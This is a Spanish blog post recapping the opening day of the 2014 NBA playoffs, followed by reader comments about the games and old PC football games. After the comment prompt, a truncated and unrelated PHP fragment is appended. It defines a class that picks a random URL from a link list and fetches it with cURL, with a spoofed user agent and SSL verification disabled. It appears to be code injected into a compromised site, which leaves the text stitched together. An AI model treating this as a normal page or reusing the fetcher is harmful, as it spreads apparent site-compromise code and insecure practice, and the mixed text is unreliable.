La Crónica: Tropiezos inaugurales

20 de April de 2014 por TheDeerHunter

Extraordinaria jornada inaugural de los playoffs 2014. Grandes dificultades para todos los cabezas de serie. Este es un mundo baloncestístico a parte y todo lo bueno o malo que hayas hecho durante el curso queda en un segundo plano.

Comenzó como algunos apuntábais. Los Nets dieron un clínic de saber estar en una eliminatoria y los Raptors necesitaron un cargamento de Dodotis cuando terminó el encuentro. Los “Dinosaurios” sabían que debían aprovechar el congojo inicial de sus jóvenes rivales y salieron a hacer toda la sangre del mundo. Joe Johnson abusando de sus pares y Deron Williams recordándonos a su mejor versión. Fue todo suyo el ritmo del encuentro. El primer parcial fue de 29 puntos para ellos y suerte que Valanciunas y Lowry mantenían de alguna manera el barco a flote. DeRozan naufragando por completo.

Los Raptors sudaron para recuperarse. Cada mínima desventaja se convertía en un viacrucis. La salida de Vasquez y Patterson significó algunos grandes momentos de intensidad, fiando todo a  contragolpes. Llegó a parecer que se inclinaba el choque a su favor. A falta de 5 minutos Vasquez anotaba un triple para ponerse 76-75 arriba. A partir de aquí… monólogo del Tiranosaurio Pierce. Canasta de Jo Jo; doble error de Raptors; canastón de Garnett que se había arrastrado hasta ese momento; fallo de Lowry; triple de Pierce; anota Valanciunas y se acabó, tres canastones seguidos marca de la casa de “The Truth” que aseguraban la victoria. En apenas 2 minutos 9 puntos sin fallo. Lo bueno es que se había tirado sesteando los tres primeros cuartos y buena parte de ese.

En el Staples los Clippers se las prometían más felices al inicio. Parecían abusar de sus rivales, con DeAndre a la cabeza, a pesar de los tempranos problemas de faltas de Griffin. Pronto también iban a entrar en problemas Jermaine y David Lee, además que Marc Jackson parecía hacerle un favor a su colega manteniendo a Iguodala con 3 faltas en pista, hacía la 4ª restando 5 minutos para el descanso. Sin embargo los Warriors lograban anotar con la facilidad con la que ellos suelen, empataban al final del segundo y entraban en combustión en el tercero. Rivers devolvía el favor y arriesgaba, errando, con las faltas de Griffin. Lee y Klay Thompson hacían daño, mientras que la segunda unidad de los Clippers se desconectaba. Sólo Reddick lograba mantener el pulso. Con todo perdido y sufriendo la inmensa defensa de Klay, Chris Paul se tiró el equipo a la espalda y golpeó fuerte en el último cuarto. Las eliminaciones de Iggy y Griffin no cambiaron nada. Klay Thompson siguió perforando a placer y algunos extraños errores del propio Paul terminaron por condenar a su equipo. Los Clippers jamás han ganado una serie empezándola perdiendo.

Como no hay dos sin tres y los Pacers están en modo hara-kiri, como no podía ser de otra manera, perdieron. Remando desde el principio, como acostumbran a hacer en los últimos tiempos. Los Hawks les endosaron 28 en el primero, aprovechando a la perfección sus armas. Un correcto partido de George y Stephenson, junto con uno de las contadas buenas aportaciones de Evan Turner parecían poner las cosas en sus sitio, llevando las tablas al descanso. Tras la reanudación, con Hibbert y West perdidísimos, los Hawks demarraban. 30-16 en el tercero que después se limitaron a administrar. Exhibición de Teague y Millsap.

En Oklahoma los Grizzlies dieron la imagen de corderos degollados durante gran parte del partido. El comienzo fue a placer para l Thunder, con el perímetro de Memphis colapsado y los locales inflando a contragolpes. Westbrook un puñal, por si dudábamos.
Sin embargo, 24 abajo, el oso despertó en el tercer cuarto y endosaron un 31-13 increíble que amenazaba seriamente la victoria de los favoritos. Gran detalle de equipo perro. Durant y los suyos supieron reaccionar y los problemas de faltas les allanaron el camino. El último cuarto cumplió la tónica de los dos primeros y los Thunder fueron los únicos locales ganadores anoche.

PREMIOS

MVP: Durantula ha comenzado su camino al anillo como terminó la regular. 33 puntos, 8 rebotes y 7 asistencias contra un equipo que no es precisamente una madre en defensa.

Sorpresa: Gran partido de Harrison Barnes. Mejor de lo que indican sus números. 14 puntos, 8 rebotes, 1 asistencia y 1 tapón en 24 minutos. Le apuntamos una jugada decisiva en los momentos más calientes, taponazo y triple posterior que dejaba el ánimo de los Clippers por los suelos. Sorprendió que le sentaran y no volviera a salir justo inmediatamente después.

Decepción: Terrible actuación de Demar DeRozan, aunque algunos ya le tienen como sospechoso habitual por su carácter. 3 de 13 en tiro e intrascendente en defensa. Extremadamente poco para un all-star. Otro de esta categoría que se la pegó fuerte fue Roy Hibbert que no está y no sabemos si se le espera.

Esfuerzo en vano: Lo pasó fatal Chris Paul ante la marca de Klay Thompson. Sin embargo es lo que tienen estos “marcianos” de su categoría de jugador, aún así estuvo a punto de llevarse el partido. 27 puntos, 8 rebotes, 7 asistencias y 1 robo que pudo ser decisivo. Curiosamente dos errores clamorosos suyos supusieron la derrota.

Comenta

13 comentarios a esta entrada

  1. M dice:
    #1

    Paul es increíblemente bueno, pero su lectura del partido fue pésima, y su afán por flopear (o como se diga xD) es un lastre tremendo. Como las faltas tontas que prodiga Griffin sin ton ni son.

    Grandes Warriors, juego coral, buena lectura de Curry, y problemas en el rebote que la ausencia de Griffin impidió que fuera el hecho definitorio del partido. Go Warriors 🙂

      Citar

  2. rumbero dice:
    #2

    M:
    Paul es increíblemente bueno, pero su lectura del partido fue pésima, y su afán por flopear (o como se diga xD) es un lastre tremendo. Como las faltas tontas que prodiga Griffin sin ton ni son.

    Grandes Warriors, juego coral, buena lectura de Curry, y problemas en el rebote que la ausencia de Griffin impidió que fuera el hecho definitorio del partido. Go Warriors

    La verdad es que el último cuarto de Paul fue una maravilla quitando los últimos 30 segundos. Le pierde el flop si. Es cierto que los árbitros podrían haber pitado falta en la jugada donde pierde el balón (y más viendo lo ligeros de pito que estuvieron durante todo el partido) pero es que es lo que iba buscando descaradamente. De héroe a villano.

    Y muy bien los Warriors. Ya veníamos diciendo que estos iban a ser muy peligrosos en postemporada si se ponían a ello. Lo que me parece destacabale es que lo hicieran sin su arma durante la regular que ha sido básicamente tirar del talento del Curry. 4 puntos en el tercer cuarto y 0 en el último. Buena defensa de los Clippers y bien leído por parte de Jakson/Curry. Luego está Barnes que parece que sólo juega bien en PO y ojito al factor Draymond Green que ayer fue absolutamente clave. Partidazo el suyo

      Citar

  3. Ruxixon dice:
    #3

    A mí la defensa de los Clippers como equipo me pareció inexistente en muchos minutos,sobre todo en un momento que los Warriors se marcaron 3 bonitas jugadas finalizadas debajo de la canasta sin oposición -ausencia de B.Griffin fundamental-,creo que fue cuando se pusieron 11 arriba.Mucho mejor ya en los úlitmos minutos,cuando Collison y Paul estaban sobre el parqué,de hecho tuvieron posibilidades de ganar el partido pero llegó ese momento desastre de CP3.No sé,mi sensación es que los Warriors si que presentaron una versión al 100% y los de Rivers no,no sé si un poco perdidos sin la referencia de Griffin.

    Lo de Indiana es de traca,los Hawks tienen que oler sangre y tirarse a su cuello con todo lo que puedan.No sé qué movidas habrá en ese vestuario pero el bajón es histórico.Muchas ganas de ver el segundo de la serie.A ver si encuentro tiempo.

      Citar

  4. Ruxixon dice:
    #4

    Ojo que Dallas está golosón y quiere seguir la racha de “upsets” de ayer

      Citar

  5. rumbero dice:
    #5

    Lo tienen ahí y eso que acaban de desaprovechar una ventaja de +10. Duncan impone mucho aún con la rodilla tocada

      Citar

  6. Ruxixon dice:
    #6

    Vaya exhibición de 7 minutos de los Spurs,madre mía.

      Citar

  7. rumbero dice:
    #7

    Ruxixon:
    Vaya exhibición de 7 minutos de los Spurs,madre mía.

    Tremendo. La vieja guardia tomando el mando y Leonard amargando a Dirk. Se van a acordar en Dallas de este partido; lo han tenido ahí pese al mal partido de Ellis y Nowitzki. Y muy grande Popovich mandándole un mensaje a Craig Sager mientras lo entrevistaba su hijo. “Vuelve pronto. Prometo ser amable” Crack

    A todo esto los Cats dando la cara pese a que Jefferson está jugando con molestias por fascitis plantar. Aunque da la impresión que a Miami le queda alguna marcha

      Citar

  8. Sancho88 dice:
    #8

    Joder, al final tiene corazoncito y todo Popo… snifff…

    Oye, sabéis si la NBA va a seguir poniendo los partidos como ahora, uno detrás de otro desde las siete de la tarde? Madre mía, triunfarían por todo lo alto. Me parece un sistema muy bueno para divertirte a saco. Inmejorables horarios incluso

      Citar

  9. Sancho88 dice:
    #9

    Por cierto, James Jones el nuevo Mike Miller?? Dicen que se entrena como un loco, que va a la pista de entrenamiento siempre el primero, que se tira triples como para parar un tren… el tipo como no juega se ve que se pasa el año preparándose para un momento ‘danone world cup football’ (esto solo lo entenderán los muy pros, cuando le apuntaba Zidane a un niño rubio para que salier a tirar el penalty… os acordáis ese pedazo de anuncio?) pues Jones debe soñar con eso pero en plan que le diga Spoelstra… sal hijo y danos el anillo. Tiene que emocionarle y todo. Siempre me ha parecido un jugador aceptable con una gran mano. En realidad puede ser un as en la manga para los playoffs. A ver si lo siguen usando

      Citar

  10. Sancho88 dice:
    #10

    Si te comías 40 yogures y enviabas las tapas por correo te mandaban un juego de pc de una calidad similar al mítico FIFA 97, cuando aún te dejaban la opción de jugar en campo de hierba o en campo de futbito. El Danone World Football era un juegazo similar, que te entretenías poniendo el nombre y los números de camiseta a los equipos que quisieras, había una montonada de equipos, de copas diferentes… y el juego tenía su dificultad. Sin duda unas viciadas muy guapas daba ese juego. Y ya si jugabas con el jostick, que era una especie de consolador con forma de pene de Nacho Vidal, entonces molaba más, pero con el teclado del pc también estaba bien. Ojo, el comentario ha degenerado en muy gay, pero es que los cacharros esos para jugar al orde eran así, palabra de Jesús Gil

      Citar

  11. Sancho88 dice:
    #11

    https://www.youtube.com/watch?v=xQG22tM6Gr4

    Esto y el PC Basket 5.0 son canela en rama. Bueno, y el PC Fútbol 7 eso ya sí que fue la polla record…

      Citar

  12. rumbero dice:
    #12

    Jajaja lagrimilla Sancho. El puto juegazo de Danone. Yo fui de los que envié 50 tapas…que vicios. Recuerdo que en el descanso de los partidos te metían un par o 3 anuncios de Danone y no podías quitarlos. Cosa fina si señor

    A todo esto lo de James Jones habrá que verlo. Si Spoelstra lo dejó más de la cuenta porque estuvo fino o va ser su nuevo Miller sin haber rascado bola en toda la regular. Cosas de coach

      Citar

  13. Sancho88 dice:
    #13

    fuck yeaaaaaaaaaaaaaah rumbero!! dios nos cría y nosotros solos nos juntamos, los frikis me refiero, jejejeej. Saludos crack!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>